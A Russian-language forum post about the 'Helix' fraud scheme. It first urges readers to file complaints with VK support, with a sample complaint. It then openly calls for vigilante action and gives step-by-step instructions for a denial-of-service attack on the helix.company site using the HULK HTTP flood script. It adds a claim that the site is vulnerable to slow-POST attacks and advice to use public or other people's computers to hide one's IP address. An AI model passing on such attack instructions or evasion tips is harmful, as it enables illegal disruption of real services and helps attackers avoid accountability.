Просьба к неравнодушным людям, умеющим составлять аргументированные жалобы, подать жалобы на хеликсовые паблики ВК. Эти мошенники как ни в чем не бывало продолжают обманывать людей, даже после скама (!) и взятия под стражу (!!!). Судя потому, что основателей ОПГ отпустят под залог, они имеют все шансы оказаться за пределами Украины, не дождавшись решения суда. Потому наша задача хотя бы закинуть им пару костей в горло. Одно дело если бы Helix соскамился и честно об этом заявил, и совсем другое - то, что происходит сейчас. Поэтому,
Открываем vk.com/support?act=new
и пишем аргументированную и обоснованную жалобу.
Вот к примеру моя:
Здравствуйте, на неделе СБУ была пресечена деятельность ОПГ, участники которой обманули жителей Тернопольщины на более 2700000 гривен. Подробнее:
[ссылки на ресурсы с сбу, сми, видео - форум не дает мне запостить ссылки]
Тем не менее, их паблики все еще функционируют, и продолжают обманывать людей, несмотря на то, что основатели находятся на скамье подсудимых.
Я хотел бы перечислить эти паблики:
[перечисляем паблики Нагуты]
Блокировка пабликов - только начало, планируется своими силами осуществить блокировку доменов ОПГ совместно с Киберполицией.
Кроме того, можно прямо сейчас перейти к агрессивным мерам против ОПГ, например - dos. Не сможет СБУ, не сможет суд - сможем мы.
Устанавливаем Python 2.7.12 (www .python.org/downloads/), и добавляем при установке path-переменную.
Скачиваем packetstormsecurity .com/files/112856/HULK-Http-Unbearable-Load-King.html, и бросаем hulk.py на диск C:\
Запускаем командную строку: вводим
cd c:\
hulk.py h tt p: // helix.company (адрес без пробелов)
Даже с 1 компьютера сайт будет лежать с ошибкой 503, поскольку уязвим для Slow Post атаки (миллионная афера не удосужилась даже нормально заплатить сисадмину, чтобы тот сконфигурировал сервер). Скорей всего к этой атаке уязвимы все сервисы Нагуты. Примечание: рекомендуется иметь динамический IP, или пользоваться общественным/чужим/выделенным ПК, чтобы не засветить свой IP сисадминам хеликсоидов.
На вопросы продвинутых юзеров с опытом в ИТ отвечу в личке. Данное сообщение будет удалено через 24 часа.